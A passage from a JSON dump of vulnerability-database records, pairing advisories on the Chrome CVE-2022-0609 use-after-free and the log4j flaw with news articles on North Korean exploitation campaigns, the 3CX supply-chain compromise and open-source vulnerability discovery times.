"UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "gitlab", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-22T00:00:00", "id": "GITLAB-BAB522840703640933BAA696F2FDFDBD", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.Wpf.NETCore%2FGMS-2022-148.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-10-18T04:32:23", "description": "The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T00:00:00", "type": "gitlab", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-22T00:00:00", "id": "GITLAB-4645688CBD76D08EFF12D00465ABCA3B", "href": "https://gitlab.com/api/v4/projects/12006272/repository/files/nuget%2FCefSharp.OffScreen.NETCore%2FGMS-2022-143.yml/raw", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "osv": [{"lastseen": "2023-03-28T05:37:59", "description": "CVE-2022-0609: Use after free in Animation\n\n- https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html\n- https://vulners.com/cve/CVE-2022-0609\n\nGoogle is aware of reports that exploits for CVE-2022-0609 exist in the wild.\n\nThe exploitation is known to be easy. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction. Technical details are unknown but an exploit is available.\n\nThere is currently little other public information on the issue other than it has been flagged as `High` severity.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-22T21:51:19", "type": "osv", "title": "Use after free in Animation", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2023-03-28T05:37:52", "id": "OSV:GHSA-VV6J-WW6X-54GX", "href": "https://osv.dev/vulnerability/GHSA-vv6j-ww6x-54gx", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-11T21:27:59", "description": "### Impact\nUIMA PEAR projects that have been generated with the `de.averbis.textanalysis:pear-archetype ` version `2.0.0` have a maven dependency with scope `test` to` log4j 2.8.2` and might be affected by CVE-2021-44228.\n\n### Patches\n- The issue has been resolved in `de.averbis.textanalysis:pear-archetype ` version `2.0.1`. Please make sure to use `de.averbis.textanalysis:pear-archetype ` version >= `2.0.1` for generating new PEAR projects.\n\n- Existing maven PEAR projects can be patched by manually upgrading to `log4j` >= `2.16.0` in `pom.xml`.\n\n\n### References\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in https://github.com/averbis/pear-archetype/issues\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-16T21:01:51", "type": "osv", "title": "Critical vulnerability in log4j may affect generated PEAR projects", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T18:57:47", "id": "OSV:GHSA-J7C3-96RF-JRRP", "href": "https://osv.dev/vulnerability/GHSA-j7c3-96rf-jrrp", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-05T05:19:18", "description": "\nChen Zhaojun of Alibaba Cloud Security Team discovered that JNDI features\nused in configuration, log messages, and parameters do not protect\nagainst attacker controlled LDAP and other JNDI related endpoints. An\nattacker who can control log messages or log message parameters can\nexecute arbitrary code loaded from LDAP servers when message lookup\nsubstitution is enabled.\n\n\nFor Debian 9 stretch, this problem has been fixed in version\n2.7-2+deb9u1.\n\n\nWe recommend that you upgrade your apache-log4j2 packages.\n\n\nFor the detailed security status of apache-log4j2 please refer to\nits security tracker page at:\n<https://security-tracker.debian.org/tracker/apache-log4j2>\n\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: <https://wiki.debian.org/LTS>\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-12T00:00:00", "type": "osv", "title": "apache-log4j2 - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-08-05T05:19:15", "id": "OSV:DLA-2842-1", "href": "https://osv.dev/vulnerability/DLA-2842-1", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:33", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEgInMg5oi0EuLT48UdHSduKG1gC3QcDY31qtxed-1eLVZHmLmB8WlxqvHc8R-sJTKH1US2u2oCIsGlm9hWzM_AxHS104Ld0Uu3NNK1_J7y0Peoq5ju3dD6temNu7yRQKMOZoLszL4i9VJjnGs9A_j6bQRDzyi6d90sA94gk0bv7qQ2QhbM063DW4_DD>)\n\nGoogle on Monday rolled out fixes for eight security issues in the Chrome web browser, including a high-severity vulnerability that's being actively exploited in real-world attacks, marking the first zero-day patched by the internet giant in 2022.\n\nThe shortcoming, tracked **CVE-2022-0609**, is described as a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in the Animation component that, if successfully exploited, could lead to corruption of valid data and the execution of arbitrary code on affected systems.\n\n\"Google is aware of reports that an exploit for **CVE-2022-0609** exists in the wild,\" the company [said](<https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html>) in a characteristically brief statement acknowledging active exploitation of the flaw. Credited with discovering and reporting the flaw are Adam Weidemann and Cl\u00e9ment Lecigne of Google's Threat Analysis Group (TAG).\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhw_zmtHqnXqaJefS7oZvh28qsxonD53oGecFvi_dhJmSWdL-G6nLJJofAgUuHYiNJ4LK8f3Sx-dUK2u2NjZkZWNh9NIbuWElXZzkaMTS74E0MA9uCJmd_cqoWj5T6ytx9I936Vwjxz_rIsv65CDhPE6TaInytmKM7LDh3D7Kw4TPdq6yPiJOLiQu2T>)\n\nAlso addressed by Google four other use-after-free flaws impacting File Manager, Webstore API, [ANGLE](<https://en.wikipedia.org/wiki/ANGLE_\\(software\\)>), and GPU, a heap buffer overflow bug in Tab Groups, an integer overflow in Mojo, and an issue with inappropriate implementation in Gamepad API.\n\nGoogle Chrome users are highly recommended to update to the latest version 98.0.4758.102 for Windows, Mac, and Linux to mitigate any potential threats. It's worth noting that Google had addressed [17 zero-day flaws](<https://thehackernews.com/2021/12/update-google-chrome-to-patch-new-zero.html>) in Chrome in 2021.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-15T05:06:00", "type": "thn", "title": "New Chrome 0-Day Bug Under Active Attack \u2013 Update Your Browser ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-02-16T04:13:12", "id": "THN:A7304742B34CEB82ECB0DB1AE4DD7116", "href": "https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-22T08:18:10", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjYQKkzY_-mItw25Wa6aQD0IVkkL1G7_qgOa1tw2npjUQUrl-xwgz9g1wJ9Q1Drav9iy8Q0Dhj9J_9szRCLzM0vldk7WEUr_x93_N9pMzqV1mYPdl59j5aD2CPYNqmwrl9vQ6WKwvh3LXtyOvVytBIfLsknbKJ0EfpukdsnLKVPF7TcKzlg6dAS7Mzr/s728-e365/supply-chain-hack.png>)\n\nThe supply chain attack targeting 3CX was the result of a prior supply chain compromise associated with a different company, demonstrating a new level of sophistication with North Korean threat actors.\n\nGoogle-owned Mandiant, which is [tracking](<https://thehackernews.com/2023/04/lazarus-sub-group-labyrinth-chollima.html>) the attack event under the moniker **UNC4736**, [said](<https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise>) the incident marks the first time it has seen a \"software supply chain attack lead to another software supply chain attack.\"\n\nThe Matryoshka doll-style cascading attack against 3CX first came to light on March 29, 2023, when it [emerged](<https://thehackernews.com/2023/03/3cx-supply-chain-attack-heres-what-we.html>) that Windows and macOS versions of its communication software were trojanized to deliver a C/C++-based data miner named ICONIC Stealer by means of a downloader, SUDDENICON, that used icon files hosted on GitHub to extract the server containing the stealer.\n\n\"The malicious application next attempts to steal sensitive information from the victim user's web browser,\" the U.S. Cybersecurity and Infrastructure Security Agency (CISA) [said](<https://www.cisa.gov/news-events/alerts/2023/04/20/cisa-releases-malware-analysis-report-iconicstealer>) in an analysis of the malware. \"Specifically it will target the Chrome, Edge, Brave, or Firefox browsers.\"\n\nSelect attacks targeting cryptocurrency companies also entailed the deployment of a next-stage backdoor referred to as [Gopuram](<https://thehackernews.com/2023/04/cryptocurrency-companies-targeted-in.html>) that's capable of running additional commands and interacting with the victim's file system.\n\nMandiant's [investigation](<https://www.3cx.com/blog/news/mandiant-security-update2/>) into the sequence of events has now revealed the patient zero to be a malicious version of a now-discontinued software provided by a fintech company called Trading Technologies, which was downloaded by a 3CX employee to their personal computer.\n\nIt described the initial intrusion vector as \"a malware-laced software package distributed via an earlier software supply chain compromise that began with a tampered installer for X_TRADER.\"\n\nThis rogue installer, in turn, contained a setup binary that dropped two trojanized DLLs and an innocuous executable, the latter of which is used to side-load one of the DLLs that's camouflaged as a legitimate dependency.\n\nThe attack chain then made use of open source tools like [SIGFLIP](<https://github.com/med0x2e/SigFlip>) and [DAVESHELL](<https://github.com/monoxgas/sRDI>) to ultimately extract and execute VEILEDSIGNAL, a multi-stage modular backdoor written in C that's capable of sending data, executing shellcode, and terminating itself.\n\nThe initial compromise of the employee's personal computer using VEILEDSIGNAL enabled the threat actor to obtain the individual's corporate credentials, two days after which the first unauthorized access of 3CX's network took place via a VPN by taking advantage of the stolen credentials.\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEg1Aa0J-PjfF3a8lrSsfLYwzoSdG9KMyAfGVzxuV8Jwbp6rWpk9rgkLYWsnRs5TZUDZHDH7DE7uOJrg1jmlns4f6uc08rKfGSQLSPo_DnPYQIQkCLU2yWA7F0_FB82FTYu4l_mLXuCzetcjz-kIpq-tuBo_hZselMf1bnDtKtF8lHr2B_6ZED92oT-Z4w/s728-e365/mm.png>)\n\nBesides identifying tactical similarities between the compromised X_TRADER and 3CXDesktopApp apps, Mandiant found that the threat actor subsequently laterally moved within the 3CX environment and breached the Windows and macOS build environments.\n\n\"On the Windows build environment, the attacker deployed a TAXHAUL launcher and COLDCAT downloader that persisted by performing DLL side-loading through the IKEEXT service and ran with LocalSystem privileges,\" Mandiant said. \"The macOS build server was compromised with POOLRAT backdoor using Launch Daemons as a persistence mechanism.\"\n\nPOOLRAT, previously classified by the threat intelligence firm as SIMPLESEA, is a C/C++ macOS implant capable of collecting basic system information and executing arbitrary commands, including carrying out file operations.\n\nUNC4736 is suspected to be a threat group with North Korean nexus, an assessment that's been reinforced by ESET's [discovery](<https://thehackernews.com/2023/04/lazarus-group-adds-linux-malware-to.html>) of an overlapping command-and-control (C2) domain (journalide[.]org) employed in the supply chain attack and that of a Lazarus Group campaign called Operation Dream Job.\n\nEvidence gathered by Mandiant shows that the group exhibits commonalities with another intrusion set tracked as [Operation AppleJeus](<https://thehackernews.com/2022/12/north-korean-hackers-spread-applejeus.html>), which has a track record of carrying out financially motivated attacks.\n\nWhat's more, the breach of Trading Technologies' website is said to have taken place in early February 2022 to activate a [multi-stage infection chain](<https://thehackernews.com/2022/03/north-korean-hackers-exploited-chrome.html>) responsible for serving unknown payloads to the site visitors by weaponizing a then zero-day flaw in Google Chrome ([CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>)).\n\n\"The site www.tradingtechnologies[.]com was compromised and hosting a hidden IFRAME to exploit visitors, just two months before the site was known to deliver a trojanized X_TRADER software package,\" Mandiant explained.\n\nAnother link connecting it to AppleJeus is the threat actor's previous use of an older version of POOLRAT as part of a [long-running campaign](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-048a>) disseminating booby-trapped trading applications like [CoinGoTrade](<https://www.cisa.gov/news-events/analysis-reports/ar21-048e>) to facilitate cryptocurrency theft.\n\nThe entire scale of the campaign remains unknown, and it's currently not clear if the compromised X_TRADER software was used by other firms. The platform was purportedly decommissioned in April 2020, but it was still available to download from the site in 2022.\n\n3CX, in an [update](<https://www.3cx.com/blog/news/security-action-plan/>) shared on April 20, 2023, said it's taking steps to harden its systems and minimize the risk of nested software-in-software supply chain attacks by enhancing product security, incorporating tools to ensure the integrity of its software, and establishing a new department for Network Operations and Security.\n\n\"Cascading software supply chain compromises demonstrate that North Korean operators can exploit network access in creative ways to develop and distribute malware, and move between target networks while conducting operations aligned with North Korea's interests,\" Mandiant said.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-21T09:55:00", "type": "thn", "title": "N.K. Hackers Employ Matryoshka Doll-Style Cascading Supply Chain Attack on 3CX", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2023-04-22T06:56:47", "id": "THN:4548AA82E9B35A1EFE8DBB8D3D9464D4", "href": "https://thehackernews.com/2023/04/nk-hackers-employ-matryoshka-doll-style.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhb0TU4PRkcBXaBPsOFb0SjZitrfNUAz50SZ59ScVz8afhB3rGrhOGWwrqnqAwvQ-glDseEhe7X4Moo5jmATZL-AbZ1zSB0tAd6QPCJqZQXxrHfjHo1RBEybYwnRFQ8axJEwCceOG_FN1Y-DG3ZRhOFrlclTKjtafCS8bDD6dTOhZWgUnp6BmPO_qaB/s728-e100/north-korea-cyber-attack.jpg>)\n\nGoogle's Threat Analysis Group (TAG) on Thursday disclosed that it acted to mitigate threats from two distinct government-backed attacker groups based in North Korea that exploited a recently-uncovered remote code execution flaw in the Chrome web browser.\n\nThe campaigns, once again \"reflective of the regime's immediate concerns and priorities,\" are said to have targeted U.S. based organizations spanning news media, IT, cryptocurrency, and fintech industries, with one set of the activities sharing direct infrastructure overlaps with previous attacks [aimed at security researchers](<https://thehackernews.com/2021/01/n-korean-hackers-targeting-security.html>) last year.\n\nThe shortcoming in question is [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>), a use-after-free vulnerability in the browser's Animation component that Google addressed as part of updates (version 98.0.4758.102) issued on February 14, 2022. It's also the first zero-day flaw patched by the tech giant since the start of 2022.\n\n\"The earliest evidence we have of this exploit kit being actively deployed is January 4, 2022,\" Google TAG researcher Adam Weidemann [said](<https://blog.google/threat-analysis-group/countering-threats-north-korea/>) in a report. \"We suspect that these groups work for the same entity with a shared supply chain, hence the use of the same exploit kit, but each operate with a different mission set and deploy different techniques.\"\n\nThe first campaign, consistent with TTPs associated with what Israeli cybersecurity firm ClearSky described as \"[Operation Dream Job](<https://www.clearskysec.com/operation-dream-job/>)\" in August 2020, was directed against over 250 individuals working for 10 different news media, domain registrars, web hosting providers, and software vendors, luring them with fake job offers from companies like Disney, Google, and Oracle.\n\nThe usage of phony job listings is a time-tested tactic of North Korean nation-state groups, which, earlier this January, was [found impersonating](<https://thehackernews.com/2022/01/north-korean-hackers-using-windows.html>) the American global security and aerospace company Lockheed Martin to distribute malware payloads to target individuals seeking jobs in the aerospace and defense industry.\n\n\"The double scenario of espionage and money theft is unique to North Korea, which operates intelligence units that steal both information and money for their country,\" ClearSky researchers noted at the time.\n\nThe second activity cluster that's believed to have leveraged the same Chrome zero-day relates to [Operation AppleJeus](<https://thehackernews.com/2021/02/north-korean-hackers-targeting-defense.html>), which compromised at least two legitimate fintech company websites to serve the exploit to no less than 85 users.\n\nThe [exploit kit](<https://www.virustotal.com/gui/file/03a41d29e3c9763093aca13f1cc8bcc41b201a6839c381aaaccf891204335685>), according to Google TAG, is fashioned as a multi-stage infection chain that involves embedding the attack code within hidden internet frames on both compromised websites as well as rogue websites under their control.\n\n\"In other cases, we observed fake websites \u2014 already set up to distribute trojanized cryptocurrency applications \u2014 hosting [iframes](<https://en.wikipedia.org/wiki/HTML_element#Frames>) and pointing their visitors to the exploit kit,\" Weidemann said.\n\nThe initial stage encompassed a reconnaissance phase to fingerprint the targeted machines that was then followed by serving the remote code execution (RCE) exploit, which, when successful, led to the retrieval of a second-stage package engineered to escape the sandbox and carry out further post-exploitation activities.\n\nGoogle TAG, which discovered the intrusions on February 10, noted that it was \"unable to recover any of the stages that followed the initial RCE,\" emphasizing that the threat actors made use of several safeguards, including the use of AES encryption, designed explicitly to obscure their tracks and hinder the recovery of intermediate stages.\n\nAdditionally, the campaigns checked for visitors using non-Chromium based browsers such as Safari on macOS or Mozilla Firefox (on any operating system), redirecting the victims to specific links on known exploitation servers. It's not immediately clear if any of those attempts were fruitful.\n\nThe findings come as threat intelligence company Mandiant [mapped](<https://www.mandiant.com/resources/mapping-dprk-groups-to-government>) different Lazarus sub-groups to various government organizations in North Korea, including the Reconnaissance General Bureau (RGB), the United Front Department (UFD), and the Ministry of State Security (MSS).\n\nLazarus is the umbrella moniker collectively referring to malicious cyber and financial crime operations originating from the heavily-sanctioned hermit kingdom, in the same manner [Winnti](<https://malpedia.caad.fkie.fraunhofer.de/actor/winnti_umbrella>) and [MuddyWater](<https://thehackernews.com/2022/03/iranian-hackers-targeting-turkey-and.html>) function as a conglomerate of multiple teams to help further China and Iran's geopolitical and national security objectives.\n\n\"North Korea's intelligence apparatus possesses the flexibility and resilience to create cyber units based on the needs of the country,\" Mandiant researchers said. \"Additionally overlaps in infrastructure, malware, and tactics, techniques and procedures indicate there are shared resources amongst their cyber operations.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-25T06:45:00", "type": "thn", "title": "North Korean Hackers Exploited Chrome Zero-Day to Target Fintech, IT, and Media Firms", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609"], "modified": "2022-03-26T02:04:01", "id": "THN:87B95415D8745E9CCD461A9997E67EFE", "href": "https://thehackernews.com/2022/03/north-korean-hackers-exploited-chrome.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-01T12:06:27", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhHCMnqhwqPtQNSBXsZfmX7LEVj5u6v9J0m0PEJfwCxouhiIhao2Vs5MVncWuJ98NuxpWT7NguZoYl9dp9C4CsQNISQjl1ik3-HeBH_0aR7VPGsot16xib61mh4OHw6O8pbWPihBxdOnhJUpQ7H8hm9OS6DpuBY_aUAr7qYoai0rNSCjr6TtjWFr_JO/s728-e100/open-source-hacking.jpg>)\n\nLinus Torvalds, the creator of Linux and Git, has his own law in software development, and it goes like this: \"_given enough eyeballs, all bugs are shallow_.\" This phrase puts the finger on the very principle of open source: the more, the merrier - if the code is easily available for anyone and everyone to fix bugs, it's pretty safe. But is it? Or is the saying \"all bugs are shallow\" only true for _shallow_ bugs and not ones that lie deeper? It turns out that security flaws in open source can be harder to find than we thought. Emil W\u00e5reus, Head of R&amp;D at [Debricked](<https://debricked.com>), took it upon himself to look deeper into the community's performance. As the data scientist he is, he, of course, asked the data: _how good is the open source community at finding vulnerabilities in a timely manner_?\n\n## **The thrill of the (vulnerability) hunt**\n\nFinding open source vulnerabilities is typically done by the maintainers of the open source project, users, auditors, or external security researchers. But despite these great code-archaeologists helping secure our world, the community still struggles to find security flaws. \n\nOn average, it takes _over 800 days_ to discover a security flaw in open source projects. For instance, the infamous Log4shell (CVE-2021-44228) vulnerability was undiscovered for a whopping 2649 days. \n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiDV6UV2i1t5HF7EMQs8N5wywO9YTWCb3M_uB1ZqwVnkPDzieuVEda7tkHRQiw41mhCnz3SBVnaReHEMH2fUQNCCC_Z4S-6KYh_KH5nY-f0od8kkYPj9BWh2JjUSdnMcPRqovKz6tSxPy6tCA2_5c-bO52_9kby2Ci3hqk0g9VcmKTnSJUmn4KFxJgW/s728-e100/FLAWS.jpg>)\n\nThe analysis shows that 74% of security flaws are actually undiscovered for at least one year! Java and Ruby seem to have the most challenges here, as it takes the community more than 1000 days to find and disclose vulnerabilities. Our [white] hats go off to the PHP/Composer community, which slightly outperforms the others. \n\n## **The needle in a techstack**\n\nOther interesting factors are that some of the different weakness types (CWE) seem to be harder to find and disclose, which actually contradicts Linus's law. The weakness types CWE-400 (Uncontrolled Resource Consumption) and CWE-502 (Deserialization of Untrusted Data) typically aren't localized to a single function or may appear as intended logic in the application. In other words, it can't be considered \"a shallow bug.\" \n\nIt also seems that the developer community is a bit better at finding CWE-20 (Improper Input Validation), where the flaw most of the time is just a few lines of code in a single function. \n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjMcHcgVAMCZdOLqkgBI2vwxfxloDUpyM00TN6hWNXm2XuP6xMEA6rxvm6SSzpLbxnWheflWn2NzzpG28KssHYhTkxqvgPCreYfJUptqQ466Jvgjav1oC_3pRbCDqLGVNtbUmUGhmdO_mv8yRBolaXWeQr91wJXBpvD3XjYa4h945ZbgYI8puChOJYh/s728-e100/bugs.jpg>)\n\n## **Solve vulnerabilities with powerful remediation **\n\nWhy does this matter? As consumers of open 